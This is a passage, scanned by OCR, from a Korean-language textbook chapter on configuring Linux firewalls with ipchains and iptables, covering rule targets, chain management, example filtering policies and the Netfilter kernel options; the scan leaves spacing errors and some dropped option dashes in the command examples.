번째 조각에만 존재 한다는것 이 다. 핵 심 부는 파케 트의 첫 번째 시 작부분을 조사하여 그 파 
케트를 판단하기때문에 나머지 조각들에서 문제가 생길수있다. 체계핵심부 를파일시 아래 
의 옵션을 설 정한후 콤파일 하였 다면 문제 가 되 지 않는다. 

IP * always defragment 

만약 우의 옵션을 넣지 않고 핵심부를 콤파일하였을 경우에는 다음과 같이 설정 하면 문 
제 가 생긴다. 

-p TCP -s 192.168.1.1 80 
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우의 설정에서 첫번째 파케트는 문제없이 처리된다. 하지만 나머지 파케트들은 우의 규 
칙에 일치하지 않게 된다. 그러나 - f 옵션을 사용하면 두번째 파케트조각들에 대해서도 규 
칙을 명시할수 있다. 

一 려과효과 

파케 트가 설 정 된 규칙 에 부합되 면 규칙 에 대 한 byte 계 수기 가 파케 트의 크기 만큼 증가 
하고 또한 파케 트의 계수기도 증가한다. 또한 규칙 에서 요구되는 경우에는 파케트를 기 록 
하고 봉사류형마당을 변경할수도 있 다. 마지 막으로 규칙 에 서 요구하는 경 우 파케 트를 표 
시 하며 규칙 의 목표를 결정할수도 있 다. 그러 면 려 과효과에 대 한 구체 적 인 내 용을 고찰해 
보자. 

① 규칙의 목표결정 

목표는 핵심부가 규칙에 맞게 파케트를 어떻게 처 리할것 인가를 결정하는것 이 다. 목표 
를 지정하기 위해서는 : j 를 리용한다. 규칙의 목표에는 6가지가 있다. 

우선 3가지는 이미 언급한 ACCEPT , REJECT , DENY 이다. 나머지는 MASQ , 
REDIRECT , RETURN 이 다. MASQ 는 가장동작을 수행 하도록 목표를 지 정 하고 REDIRCT 
는 파케 트의 방향을 무조건 지 역 포구로 변경한다. 마지 막으로 RETURN 은 즉시 사슬의 마 
지 막 항목에 서 탈퇴 하도록 하는것 이 다. 

② 파케트기록 

규칙 에 일 치 하는 파케트에 대 해서 -1 을 사용하여 기록을 할수 있다. 이것은 정상적 인 
파케 트의 기 록보다도 례 외상황을 기 록하여 발견하려 고 할 때 사용한다. 

③ 봉사류형마당변경 

IP 머 리 부 ( header ) 에 서 일 반적 으로 자주 사용되 지 않는 4개 의 비 트를 봉사류형 ( TOS , 
Type of service ) 비 트라고 한다. 이 4개 의 비 트는 최 소지 연 (Minimum delay ) , 최 대 전송 
률 (Maximum Throughput ) , 최 대 믿 음성 (Maximum Reliability ) , 최 소경 로 (Minimum 
cost ) 를 나타낸 다. 이 것 들은 한번 에 하나만 설 정 할수 있 다. 표 3-13 은 봉사류형 ( TOS , Type 
of service ) 의 이름과 그에 해당한 값을 나타낸다. 


표 3-13. 봉사류형 ( ToS:Type of Service ) 


봉사류형 

16 진수값 

용도 

최 소지 연 (Minimum delay ) 

0 x 010 x 10 

ftp , telnet 

최 대 전송률 (Maximum Throughput ) 

0 x 010 x 08 

ftp-data 

최 대 믿 음성 (Maximum Reliability ) 

0 x 010 x 04 

Snmp 

최소경로 (Minimum cost ) 

0 x 010 x 02 

nntp 


鍾 
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일반적 인 사용방법 을 본다면 telnet 나 ftp 에 대 해서는 최소지연 (Minimum delay ) 을 사 
용하고 ftp 자료 ( ftp - data ) 에 대해서는 최대전송률 (Maximum Throughput ) 을 사용하는것이 
다. 아래와 같이 간단한 설정을 실례로 들수 있다. 

ipchains -A output -p tcp -d 0.0. 0.0/0 telnet t 0 x 01 0 x 10 

ipchains -A output -p tcp -d 0.0. 0.0/0 ftp -t 0 x 01 0 x 10 

ipchains -A output -p tcp -d 0.0. 0.0/0 snmp -t 0 x 01 0 x 04 

ipchains -A output -p tcp -d 0.0. 0.0/0 nntp -t 0 x 01 0 x 02 

우의 실례에서 마를 사용한것은 전달 변수를 2개 받기 위해서이다. 

- 전체 사슬에 대한 동작 

ipchains 는 련관된 규칙 을 하나로 묶어서 사슬에 넣 을수 있는 편리 한 기 능을 제 공한 
다. input , output , forward 와 같은 내 장사슬과 ACCEPT , REJECT , DENY , RETURN , 
REDIRECT 와 같은 내장목표의 이름과 같지만 않다면 사슬의 이름은 어떻게 만들어도 상 
관없다. 단지 사슬의 이름은 최대로 8개 문자로 제한된다. 

— ipchains 활용 

지 금까지 ipchains 를 리용하여 파케 트에 대 한 규칙 을 설정할수 있는 방법 에 대 해서 고 
찰하였 다. 여 기서는 직 접 여 러 가지 경 우를 가정 하여 ipchains 를 사용해 보자. 

① 단일규칙적용 

ipchains 를 사용할 경우 대부분의 경우에는 -쇼로 사슬에 새 로운 규칙을 추가하고 D 
를 사용하여 사슬에 규칙 을 제 거 하는 명 령 을 가장 많이 사용한다. 간단하게 아래 와 같이 ping 
응답에 대 한 규칙 을 만들어보자. 


ipchains -A input -s 127. 0.0.1 -p icmp -j DENY 


우의 실례 는 input 사슬에 127. 0.0.1 로부터 들어오는 과케 트들중 통신규약이 ICMP 
에 해 당하는것 들을 검 사하여 DENY 로 설 정한것 이 다. 이 와 같이 설정하게 되 면 아무리 
127. 0.0.1 로 ping 응답을 기다려도 응답은 오지 않게 된 다. ping 에 대 한 응답은 오지 않 
지만 프로그람을 기다리는 시간이 있기때문에 계속 지연된다. 

그럼 반대 로 규칙 을 지 워보자. ipchains 에 서 규칙 을 지 우는 방법 에 는 2가지 가 있 다. 

첫 번째 방법 은 사슬의 규칙번 호를 리용하는 방법 이 고 또 다른 방법 은 - D 를 사용하는 
방법 이 다. 하지 만 규칙번 호를 사용하여 규칙 을 지 우는 방법 은 해 당 규칙 의 번 호를 알고있 
어 야만 가능하다. 우와 같은 경 우에 는 해 당 사슬에 규칙 을 오직 하나를 설정 하였 으므로 규 
칙번호는 1이 될것이다. 규칙이 사슬에 옳게 적용되였는지 확인하기 위해서는 아래와 같 
은 명 령으로 확인할수 있다. 


ipchains -L input 
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아래의 명령은 규칙번호를 사용하여 규칙을 지우는 명령이다. 우에서 언급한 명령을 리 
용하여 삭제할 규칙의 번호를 알고있다면 다음과 같은 방법으로 규칙을 지울수 있다. 

ipchains -D input 1 

류사하게 다음의 명령은 - D 를 사용하여 규칙을 지우는 명령이다. 만약 앞에서와 같 
이 규칙의 번호를 알지 못할 경우에는 이와 같이 규칙을 지울수 있다. 단순히 규칙을 만 
들 때 사용한 명령에서 _쇼를 - D 로 바꾸면 된다. 


ipchains -D input -s 127. 0.0.1 -p icmp -j DENY 

우와 같이 해당 규칙을 지우기 위해서는 - D 와 - A 를 사용한 명령에서 사용하는 옵션들 
은 모두 동일해 야 한다. 만약 동일한 규칙 이 사슬에 있는 경우에는 가장 첫번째 규칙 이 지 
워진다. 

② 사슬다루기 

ipchains 에 는 기 본적 으로 입 력 (input) ， 출력 (output) ， 전 달 (forward) 과 같은 3 개 의 사 
슬이 존재한다. 하지 만 많은 경 우에 방화벽설정 을 이 3 개 의 사슬을 가지 고 하기 에 는 부 
족한것 이 많다 . 매 개 인마다 속한 망의 구조와 환경 에 따라 모두 다른 방화벽 을 구성하 
기때문에 자신의 사슬이 필요한 경우는 얼마든지 있을수 있다. 

여 기 서 는 새 로운 사슬의 생 성 과 삭제，사슬을 초기 화하는 방법 에 대 해 서 고찰한다. 

^ 사슬생성 

다음과 같은 방법 으로 간단하게 새 로운 사슬을 생 성할수 있 다. 

ipcahins -N newchain 

새 로운 사슬을 생 성 하는 - N 대 신에 - L 을 사용하여 해 당 사슬이 생 성 된것 을 확인할수 있 
다. 이제 newchain 이라는 이름으로 생성된 사슬에 규칙들을 추가하여 사용하면 된다. 

^ 사슬삭제 

사슬을 삭제 하는 방법 도 사슬을 생성 할 때 와 마찬가지 로 아래 와같이 매우 간단하다. 

ipchains -X newchain 

다시 사슬을 확인해보면 사슬이 삭제되 여서 해 당 이 름으로 존재하는 사슬을 찾을수 없 
다는 통보를 받을것 이 다. 사슬을 삭제 하기 위 해서 는 몇 가지 제 한조건 이 있다. 우선 삭제 
할 사슬은 아무런 규칙 을 가지 지 않는 빈사슬이 여야 한다. 또한 삭제할 사슬은 다른 규칙 
의 목표로 설정 되 여 있으면 삭제할수 없다. 또한 기 본 3 가지 내 장사슬은 삭제할수 없다. 


CT 사슬에 서 규칙 지우기 

사슬에 서 모든 규칙 들을 지 우기 위 해 서 는 다음과 같은 명 령 을 리 용하여 간단히 할수 있 


다. 


慶 


사슬을 지정 하지 않고 사슬에서 규칙을 지우는 명령을 리 용하는 경우 모든 사슬 
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^ 사슬규칙보기 

지금까지 사슬의 생성과 삭제，사슬에서 규칙지우기에 대해서 고찰하였다. 그러면 이 
러한 명령들이 정상적으로 실행되였는지 확인할 필요가 있다. 다음과 같은 명령을 리용 
하여 사슬내부의 규칙들은 물론 특정사슬에 대한 확인도 할수 있다. 

ipchains -L newchain 

우에 서 사슬이 름이 생 략된 경 우에 는 모든 사슬을 표시 하게 된 다. 사슬에 비 록 규칙 이 
없 다고 해 도 표시 된 다. 사슬의 규칙 을 보기 위 한 - L 명 령 과 함께 사용할수 있는 옵션들이 
3개 있다. 표 3-14 에서 이 옵션들에 대해서 구체적으로 보여주고있다. 


표 3-14. L 명령옵션 


옵션 

설명 

-V 

파케트，바이트，계수기 ， TOS 마스크，대면부 그리고 파케트표식과 같은 세 
부적인 규칙 들도 볼수있 다. 

-X 

파케 트，바이 트，계 수기 의 값들을 완전한 수자로 표시 해 준다. 보통 파케 트，바 
이트，계수기값은 1000,1000000,1000000000에 대해서 각각 K , M , G 와 같 
은 접미사를 사용한다. 

_n 

IP 주소 살펴보기를 하지 않게 한다. 만약 DNS 가 제대로 설정되지 않아 시간 
적지연이 발생하거 나 DNS 요청 을 려 과한 경 우에 유용한다. 


ᄄ 계수기재설정 

계 수기값을 0으로 재 설정하는 방법 은 지 금까지 고찰한 사슬 다투는 명 령 들처 럼 역 시 
간단하다. 다음의 명 령을 리용하여 계수기를 0으로 만들수 있다. 
ipchains -Z newchain 

그러나 여기에 약간의 문제점이 있다. 드문 경우이지만 재설정 바로 전의 계수기값을 
알아야 할 필요가 있을수 있다. 이런 경우 - Z 명령을 리용하여 계수기값을 0으로 재설정 
하기 직전에 지나가는 경우가 발생 할수 있 다. 이러한 문제를 해결하기 위 해서 _ L 과 _ Z 를 
같이 사용하면 된다. 하지만 이렇게 사용할 경우에는 하나의 단일 사슬에 대해서 명령을 내 
릴수가 없다. 그러므로 모든 사슬을 동시 에 0으로 만들어 야 한다. 


③ 방책설정하기 

방책을 설정하기 전에 우선 파케트가 어떤 경로를 통하여 어떻게 처리되는지 고찰하 
자. 표 3-15 는 체계로 전달된 파케트가 거 치는 경로들이다. 


% 
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표 3-15. 

파케트의 경로 

단 계 

설 명 

검사합 
(checksum) 

파케트가 가장 처음으로 거치는 단계이다. 파케트가 전송도중에 손 
상되였가를 검사하여 손상된 파케트는 무시된다. 

정 상성 검 사 
(sanity) 

입 력사슬단계 로 가기 전에 사슬의 정 상성 을 검 사하는 단계 이 다. 만 
약 문제 가 있는 파케 트가 사슬로 들어가게 되 면 사슬안의 규칙 에 혼 
란을 초래할수 있으므로 여 기서 검사를 하여 이 단계 에서 문제 가 있 
는 파케트들은 무시된다. 

입 력 사슬 
(input chain) 

파케 트가 가장 처 음으로 거 치는 방화벽사슬이다. 입 력사슬의 검 사결 
과 DENY 또는 REJECT 에 해 당되 지 않으면 다음 단계 로 넘 어 간다. 

역 가장 

(Demasquerade) 

파케트가 역가장된 파케트인지 검사하여 파케트를 역가장하고 출력 
사슬로 곧장 보낼지 를 결정하는 단계 이 다. 

경로설정 

(Routing Decision) 

경 로조종코드를 거 쳐 목적지 마당을 검사한다. 검사 결과에 따라 지 역 
프로쎄스로 전송되는지 또한 외부로 전송되는가에 대해서 판단한다. 

지역 프로쎄스 
(Local Process) 

경로설정 다음 단계로 파케트를 보내거 나 받을수 있다. 

지역 

(Local) 

지 역프로쎄 스에 의해서 생성된것 이 아니 라면 전달사슬에 대 해서 검 
사를 한다. 그렇지 않다면 출력사슬로 보낸다. 

전달사슬 
(Forward Chain) 

국부체계에서 외부체계로 나가는 파케트에 대해서 사슬검사를 한다. 

출력 사슬 
(output chain) 

파케 트를 외 부로 전송하기 전 에 마지 막으로 사슬규칙 을 검 사한다. 


체계로 들어온 파케트는 표 3-15 의 단계를 거치게 된다. 파케트가 들어오면 핵심부 
는 파케 트를 우선 입 력사슬을 사용하여 검사한다. 입 력사슬을 통과한 파케트가 다른 체 계 
로 전송되 여 야 하는 경 우에는 전달사슬로 전송되 고 마지 막으로 출력 사슬을 거 처 나가게 된 
다. 사슬로 들어 온 파케트들은 해 당 사슬의 규칙 에 적 용된다. 만일 한 규칙 에 적 용되지 않 
는다면 다음 규칙 에 적용된다. 더 이상 적용될 규칙 이 없게 되면 파케트는 사슬의 방책에 의 
해서 동작여부(접수，거부)가 결정된다. 

지금까지 어떻게 파케트가 사슬을 통과하는가에 대해서 고찰하였다. 여기서 알수 있 
는것처럼 파케트는 방책에 많은 영향을 받는다. 그러나 이러한 방책은 오직 3개의 내장 
사슬만이 가질수있다. 내장사슬이 가질수 있는 방책은 아래의 4가지중 하나이다. 


^ ACCEPT 
^ DENY 


^ REJECT 
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여기서 MASQ 는 오직 전달사슬만이 가질수 있는 방책이다. 

④ 파케트검사 

파케트가 체계로 들어오게 되면 사슬을 통과하면서 검사를 받게 된다. 그러나 사슬에 
서 어떠한 검사결과가 나왔는지 볼수가 없다. 그러나 때로는 어떻게 결과가 나왔는지 알 
아야 할 필요성 이 있다. 사슬을 고쳐 야 할 경우가 바로 그렇 다. 이 런 경우에는 - C 명 령을 
사용하여 파케트를 검사할수 있다. 

_ C 명 령 을 사용하면 핵 심부가 파케 트를 검사하여 결과를 줄력 하게 된다. 여 기서 주의 
할 점 이 있 다. 파케 트에 대 한 설 명 은 일 반적 인 규칙 을 따른다. 하지 만 여 기 에 득 지 정 하 
여야 할 옵션들이 있다. - p (통신규약)， - s (발신지 주소)， - d (목적지 주소)， - i (대면부) 
가 바로 그것들이다. 만일 통신규약이 TCP 나 UDP 인 경우에는 원천지와 목적지의 포구 
를 지 정하여 야 한다. -f 옵션을 리용하였 다면 해 당되 지 않는다. 반면에 통신규약이 ICMP 
인 경 우에 는 ICMP 류형 과 코드를 득 지 정하여 야 한다.특히 통신규약이 TCP 인 경 우에 는 파 
케트에 SYN 비트가 설정되 여있다는것 을 나타내 기 위하여 -y 옵션을 사용할수 있다. 

다음의 실례는 192.168.1.1 의 웨브봉사포구에서 192.168.1.2 의 웨브봉사포구로 향 
하는 TCP SYN 파케 트가 입 력 사슬에 서 어 떤 결 과를 출력하는가를 보여 주고있 다. 

ipchains -C input -i ethO -p tcp -y -s 192.168.1.1 80 -d 192.168.1.2 www 

⑤ ipchains 설정 

여 러 가지 실례 들을 통하여 ipchains 를 리용한 방화벽설정 에 대 해서 구체 적 으로 고찰 
하자. 

CT 기본방책 설정 

ipchains -F input 
ipchains -P input REJECT 
ipchains -F output 
ipchains _P output REJECT 
ipchains -F forward 
ipchains -P forward REJECT 

우에서 설정한 기 본방책은 기 본사슬에 대 해서 파케 트를 거부하는것 이 다. 
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ᄄ 입력사슬방책설정 


frpart 1 


ipchains 

A input 

i ethl 

s 192.168.1.0/24 d 0/0 j 

i ACCEPT 

frpart 2 
ipchains 

A input 

i ethO 

s 0/0 d 128.134.57.73/32 

jACCEPT 

frpart 3 
ipchains 

A input 

i lo 

s 0/0 d ACCEPT 


frpart 4 
ipchains 

A input i 

ethO s 

10.0.0.0/8 d 0/0 j DENY 



ipchains A input i ethO s 127.0.0.0/8 d 0/0 j DENY 
Ipchains A input i ethO s 172.16.0.0/16 d 0/0 j DENY 
Ipchains A input i ethO s 192.168.0.0/24 d 0/0 j DENY 

frpart 5 

Ipchains A input i ethO s 128.134. 57. 73/32 d 0/0 j DENY 
frpart 6 

Ipchains A input p tcp j DENY s 0. 0. 0. 0/0 i ethO d 0. 0. 0. 0/0 1:1024 
Ipchains A input p udp j DENY s 0. 0. 0. 0/0 i ethO d 0. 0. 0. 0/0 1:1024 

#part 7 

Ipchains A input i ethO s 0/0 d 255. 255. 255. 255/32 j DENY 
Ipchains A input i ethO s 0/0 d 128.134. 57. 255/32 j DENY 
Ipchains A input p icmp i ethO s 0/0 d 128.134. 57. 255/32 j DENY 

그림 3-12. 입력사슬설정 


그림 3-12 에 대 한 자세한 설명 은 다음과 같다. 


Part 1： 내부에서 외부에로 망접근을 허용한다. 

Part 2： 외부에서 공인 IP 로 접근을 허용한다. 

Part 3: 내 부대 면 부에 대 해 서 모두 허 용한다. 

Part 4： 외부에서 사설망으로의 접근을 막는다. 

Part 5： 외부에서 IP 주소를 속여서 접근하는것을 막는다. 

Part 6： 1번에서 1024번까지의 봉사에 대한 포구를 막는다. 

Part 7： 처음 2줄은 외부방송 ( Broadcast ) 및 내부방송 ( Multicast ) 을 막는다. 마지막 줄 
P 파케트로 외부 및 내부방송하는것을 막는다. 


은 ICMF 

'졸 
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ᄄ 출력사슬방책설정 


frpart 1 

ipchains A output i ethl s 0. 0. 0.0/0 d 192.168.1.0/24 j ACCEPT 
frpart 2 

ipchains A output i ethl s 0.0.0.0/0 d 192.168.1. 0/24 1 j REJECT 

frpart 3 

ipchains A output i ethO s 192.168.1.0/24 d 0. 0. 0.0/0 1 j REJECT 

frpart 4 

ipchains A output i ethO s 128.134. 57. 73/32 d 0. 0. 0.0/0 j ACCEPT 
frpart 5 

ipchains A output i lo s 0.0.0.0/0 d 0.0.0.0/0 j ACCEPT 
ipchains A output s 0.0. 0.0/0 d 0.0. 0.0/0 1 j REJECT _ 

그림 3-13. 출력사슬설정 

그림 3-13 에 대 한 자세한 설명 은 다음과 같다. 

Part 1： 국부내부망으로의 전송을 허용한다. 

Part 2： 사설 IP 의 경로조종을 막는다. 

Part 3： 사설 IP 의 가장동작을 막는다. 

Part 4： 허용된 공인 IP 에서 외부망으로 나가는것을 허용한다. 

Part 5： 첫번째 줄은 Loopback 으로 나가는것을 허용하는것이다. 두번째 줄은 첫번째 
규칙을 제외한 모든것 을 차단한다. 

^ 전달사슬방책 설정 


frpart 1 

ipchains A forward i ethO s 192.168.1.0/24 d 0.0. 0.0/0 j MASQ 
frpart 2 

ipchains A forward i ethO p tcp s 192.168.1.0/24 100:110 d 0/0 
1024:65535 j DENY 

ipchains A forward i ethO p tcp s 192.168.1.0/24 100:110 d 0/0 
1024:65535 j DENY _ 

그림 3-14. 전달사슬 

그림 3-14 에 대 한 자세한 설명 은 다음과 같다. 
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Parti : 사설 IP 의 외부접속을 허용한다. 

Part 2： userlink 를 리용하여 내부망으로부터 포구번호 100번에서 110번까지의 Netbios 
파케트의 외부전송을 막는다. 

2) iptables 

iptables 는 핵 심 부판본 2. 4. x 이 상부터 IP 방화벽관리 도구로 사용되 는 도구이 다. 기 본 
적인 문법과 명령，옵션들은 ipchains 와 매우 류사하기때문에 ipchains 에 익숙한 사용자 
라면 어렵지 않게 iptables 를 사용할수 있다. iptables 의 특징은 표형식으로 관리를 한다 
는것 이 다. 그리고 규칙의 순서가 중요하다. 

iptables 와 ipchains 는 명령과 옵션에서도 몇가지 달라진 점을 제외하고는 대부분 동 
일 하다. 대 표적 인 차이 점 을 살펴 보면 우선 iptables 에 서 는 더 이 상 가장 ( masquerading ) 
시 간초과를 설정하지 않는다. 이 시 간초과구역 이 NAT 의 내부구조의 시 간보다 길기때 문 
이다. 또한 iptables 에 추가된 내용은 생성된 사슬의 이름을 바물수 있는 - E 명령을 사용 
할수 있다는것 이다. 

기본적 인 사용법은 ipchains 부분을 참고하면 된다. 

一 iptables 의 설치 

방화벽 은 핵 심 부수준에 서 동작하기 때 문에 먼저 핵 심 부에 서 방화벽 이 동작할수 있도륵 
설정되여야 한다. 핵심부원천등록부인 / usr / src / Linux 에서 make menuconfig 를 실행하 
여 Networking options 를 선택한 다음 IP:Netfilter Configuration 을 선택한다. iptables 
에서 제공하는 기능만큼 여 러가지 항목이 있는데 이 가운데서 몇가지 항목을 보면 다음과 
같다. 


<*〉 Connection tracking (required for masq / NAT ) 

<*> FTP protocol support 

< > IRC protocol support 

< >Userspace queueing via NETLINK ( experimental ) 
<*>IP tables support (required for filtering / masq / NAT ) 
<*>limit match support 

< >MAC address match support 

< >netfilter MARK matchsupport 
<*>multiple port match support 
<*〉TOS match support 
<*>LENGTH match support 
<*〉TTL match support 
<*>tcpmss match support 
<*>connedtion state match support 
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<*>Unclean match support (EXPERIMENTAL) 

<*>Owner match support (EXPERIMENTAL) 

<*>Packet filtering 

<*>REJECT target support 

<*〉MIRROR target support (EXPERIMENTAL) 

<*〉Full NAT 

<*〉MASQUERADE target support 

<*〉REDIRECT target support 

<*〉Basic SNMP-ALG support (EXPERIMENTAL) 

<*>Packet mangling 
<*〉TOS target support 

< >MARK target support 

< >LOG target support 

< >TCPMSS target support 

그림 3-15. IP:Net 社 Iter Con 社 guration 차림표 

우의 차림표는 핵심부 2.4. 18 을 기준으로 한것이므로 핵심부판본에 따라 약간 다르다 . 
매 개 의 기 능을 모둘로 설정 해 도 되 지 만 static 를 선택 하여 정 적 으로 포함시 키 는것 이 좋 
다 . 우에서 선택한 매 개 항목에 대 하여 알아보자 . 

① Connection tracking (required for masq/NAT) 

방화벽을 통해 어떠한 파케트가 통과했는가에 대한 기록을 보관하는 기능이다 . 이 기 
능은 NAT 를 리용할 때 도 필 요하다 . 

② FTP protocol support 

FTP 는 다른 규약과 달리 두개의 포구가 복잡하게 동작하므로 별도의 FTP 련결추적기 
능이 필요하다 . 

③ IP tables support (required for filtering/masq/NAT) 

방화벽관리 를 위해 iptables 프로그람을 사용하므로 선택한다 . 

④ limit match support 

규칙 에 정 합되 는 개 수나 비 률을 제 한할수 있 는 기 능으로서 DoS 공격 을 차단하거 나 불 
필요한 일지기록을 일일이 남기지 않도륵 할 때 필요하다 . 

⑤ TOS match support 

IP 파케 트의 TOS 값을 지 정할수 있도륵 지 원한다 . 

⑥ Connedtion state match support 

상태추적 에 따라 정 합할수 있는 기능을 제공한다 . 
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⑦ Packet filtering 

INPUT , FORWARD , OUTPUT chain 을 통해 파케트러 과기 능을 제 공한다. 

⑧ REJECT target support 

정 합되는 파케트에 대해 DROP 하지 않고 REJECT 를 리용하도록 제공한다. 

DROP 대 신 REJECT 할 경 우 특정 한 icmp error 통보문을 보내 는 기 능을 제 공한다. 

® Full NAT 

nat 표를 사용하여 포구넘 기 기를 리용할수 있도륵 제 공한다. 

⑩ Packet mangling 

mangle 표를 사용하여 파케 트의 TOS 값을 지 정 할수 있도륵 제 공한다. 

⑪ TOS target support 

경 로지 정 하기 전에 IP 파케 트의 TOS 값을 지 정할수 있도륵 제 공한다. 

우와 같은 항목들을 선택한후 핵심부를 콤파일하고 체계를 재기동한 후 새로운 핵심 
부를 적 용한다. 그리 고 iptables 가 설 처 되 여 있지 않다면 http : // www . netfilter . org / 에 서 최 
신판본의 iptables 프로그람을 내 리 적재 하여 압축을 푼 다음 make ； make install 로 를파일 
하여 설 치 하면 / usr / local / sbin / 등록부에 iptables 실행 파일 이 생성 된다. 이 파일을 / sbin 
등록부에 복사하여 쉽게 사용할수 있도륵 한다. 

一 iptables 의 기능 

① 상래 추적 (Stateful Inspection ) 기 능 

방화벽 을 통과하는 모든 파케 트에 대 한 상태 를 추적하여 기 억 기 에 보존하고있 다가 종 
전의 련결을 가장하여 접근할 경우 기억기에 저장된 목록과 비교하여 적합하면 통과하고 그 
렇지 않으면 거부하는 기능으로서 지능화된 공격시도를 차단할수 있는 방화벽의 고급기능 
의 하나이다. 

② 향상된 정합기능 

파케트의 주소와 포구이외에 다양한 정합기능을 제공하여 현재의 련결상태，포구목록， 
MAC 주소，파케 트송신지 의 사용자나 그롭 또는 프로쎄 스， IP 머 리 부의 TOS 등 여 러 가지 조 
건을 리용하여 세부적인 려과기능이 가능하다. 

③ 향상된 기록기능 

정합되는 파케트에 대해 사용자가 원하는대로 쉽게 기록에 남길수 있다. 

④ 주소변환기능 

이 전에 는 NAT 를 리 용하기 위 해 따로 분리 되 였던 가장 ( ipmasqadm ) 기 능이 자체 적 으 
로 포함되 여있어 NAT 를 위해 별도의 프로그람을 리용할 필요가 없다. 
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一 iptables 방책 

iptables 에서 내장사슬이 가질수 있는 방책은 다음과 같다. 


^ ACCEPT 
^ DROP 


ACCEPT 는 파케 트을 받아들이 도록 방책 을 설 정하는것 이 고 DROP 은 파케 트을 거 부 
하도록 방책 을 설정하는것 이 다. 

一 iptables 표의 종류 

표에 는 nat , mangle , filter 가 있 으며 이 외 다른 표는 별 도로 생 성 하거 나 삭제 할수 없 
으며 그럴 필 요도 없 다. 그러 나 사슬은 별도로 생 성 하고 삭제할수 있 다. 특정한 표를 지 
정 하려면 아라는 옵션을 사용하면 되는데 별도로 지정하지 않을 때 에는 기 본적 으로 filter 
표로 인식된다. 


^ nat 

nat 표는 파케 트를 려 과하거 나 ttl 등 특성 을 변환하는 기 능은 없으며 단지 방화벽으 
로 향하는 파케 트를 방화벽 이 보호하는 내 부망의 다른 주소로 주소변환하거 나 방화벽내 부 
망에서 방화벽을 통하여 외부망으로 나갈때 사용된다. nat 는 POSTROUTING 과 
PREROUTING 사슬이 주로 사용되는데 POSTROUTING 은 원천 NAT ( SNAT ) 목표와 정 
합되여 내부망에서 방화벽을 통하여 외부로 나갈 때 사용되며 PREROUTING 은 목적 
NAT ( DNAT ) 목표와 정합되여 주로 외부에서 방화벽 내부봉사기로 향하는 파케트를 방화 
벽 이 보호하는 내부봉사기로 주소변환할 때 사용된다. 


u filter 

방화벽 의 기 본표로서 특정 한 규칙 에 따라서 파케 트를 려 과하거 나 통과시 키 는 역 할을 수 
행 한다. filter 표에 는 3개 의 기 본사슬이 있는데 INPUT 는 방화벽 자체 로 향하는 파케 트에 
대한 려과기능을 담당하며 FORWARD 는 방화벽 자체가 아닌 방화벽을 통과하여 방화벽 
이 보호하는 다른 봉사기 등으로 향하는 파케 트에 대 한 려 과기 능을 수행하며 OUTPUT 
는 방화벽에서 나가는 파케트에 대한 려과기능을 담당한다. 


u mangle 

파케 트의 TTL 이 나 TOS 값을 변경할 때 사용된다. mangle 표는 PREROUTING 과 
OUTPUT 사슬로 이루어져있는데 PREROUTING 에서는 경로가 결정되기 전에 방화벽으로 
들어오는 파케 트에 대 해 변경 하고 OUTPUT 사슬에서 는 내부에서 생 성된 파케 트가 방화벽 
을 통하여 나갈 때 변경한다. 


一 iptables 확장 

iptables 는 새 로운 형 태를 제 공하기 위하여 확장이 가능하다. 또한 핵심부 
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능하다. iptables 의 확장은 서 고형 래 로 일 반적 으로 / usr / local / lib / iptables 에 위 치 한다. 확 
장은 두가지 형태가 있다. 

즉 목표 ( target ) 확장과 정합 ( match ) 확장이 있다. 확장은 옵션뒤에 적재가 된다. 

① 정 합확장 

정합확장에는 여러가지 형태가 있는데 여기서는 가장 대표적인 몇가지 확장에 대해서 
고찰한다. 

^ TCP 확장 

TCP 확장의 경 우는 p 옵션을 리용하여 통신규약을 지정 하고 다른 적 용이 지정 되지 않 
으면 자동적 으로 적재 가 된다. 표 3-16 은 TCP 확장에 쓰이는 옵션들이다. 


표 3-16. 

TCP 확장에 쓰이는 옵션 

옵션 

기능 

— tcp-flags 

기 발지시 자를 설정한다. 기 발지시 자목록마스크와 지시 자 2 개의 상태 
를 나타낸다. 

—— syn 

-tcp-flags SYN, RST, ACK, SYN 의 략어 이 다. 

—sport 

원천지 TCP 포구나 포구범 위 를 설정한다. 

—dport 

목적 지 TCP 포구나 포구범 위 를 설 정한다. 

—tcp-option 

TCP 옵션을 검사한다. 


@ UDP 확장 

UDP 확장의 경우는 - p 옵션을 사용하여 통신규약을 지정하고 다른 적용이 지정되지 않 
으면 자동적 으로 적재 가 된다. UDP 확장에 쓰이는 옵션은 TCP 확장에서 설명한 一 sport , 
—dport 이 다. 기능은 TCP 확장과 동일하다. 

^ ICMP 확장 

ICMP 확장의 경우는 - p 옵션을 사용하여 통신규약을 지정하고 다른 적용이 지정되지 않 
으면 자동적으로 적재가 된다. 

ICMP 확장에 는 단 하나의 옵션만 쓰인다. - icmp - type 옵션이 그것 이 다. 이 옵션은 ICMP 
류형 의 이 름이 나 수자 그리 고 코드로 분리 된 수자를 지 정 한다. ICMP 형 태 의 이 름목록은 다 
음과 같은 명 령 으로 볼수 있다. 

-p -icmp — help 

표 3-17 은 TCP , UDP , ICMP 확장 외에 - m 옵션으로 확장될수 있는것들을 나타낸다. 
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표 3-17. m 옵션확장 


모 듈 

옵 션 

설 명 

Mac 

—— mac-source 

들어오는 파케 트의 대 면부주소를 검 사한다. 
-m mac, -match mac 로 적재 가능하다. 

Limit 

— limit 

— limit-burst 

적용검사의 속도를 제한한다. 

-m limit, -match limit 로 지 정 적 재 한다. 

Owner 

— uid - owner 사용자식 별 자 
— uid_owner 그룹식 별 자 
— pid-owner 프로쎄 스식 별 자 
— sid-owner 프로쎄 스식 별 자 

생성된 파케트의 생성자의 특징을 적용한 
다. Ping 과 같은 ICMP 파케트의 경우에 
는 소유자가 없기때 문에 적 용할수 없 다. 

Unclean 

없다. 

임의 로 완전성검사를 한다. 

-m unclean, _m match unclean 로 적 재 가 
능하다. 


^ state 확장 

state 확장은 m state 를 지정하여 적재될수 있다. state 확장은 하나의 옵션 즉 -state 
를 사용한다. 이 옵션 다음에 여 러 가지 상태가 올수 있는데 표 3_18은 - state 다음에 올 
수 있는 옵션들이다. 


표 3-18. 

state 확장에 쓰이는 옵션 

상래 

설명 

NEW 

새로운 접속을 만드는 파케트 

ESTABLISHED 

존재하는 접 속에 속하는 파케 트 

RELATED 

련 관성 을 가진 파케 트로 ICMP 오유， FTP 자료 접 속을 형 성하는 파케 트 

INVALID 

확인할수 없는 파케트，보통 DROP 방책이 적용된다. 


이 기 능은 상태추적 (Connection Tracking) 을 할 때 사용한다. 상태 추적 을 할 때 기 
본적으로 련결형통신규약인 tcp 는 물론이고 비련결형통신규약인 udp 나 icmp 파케트도 추 
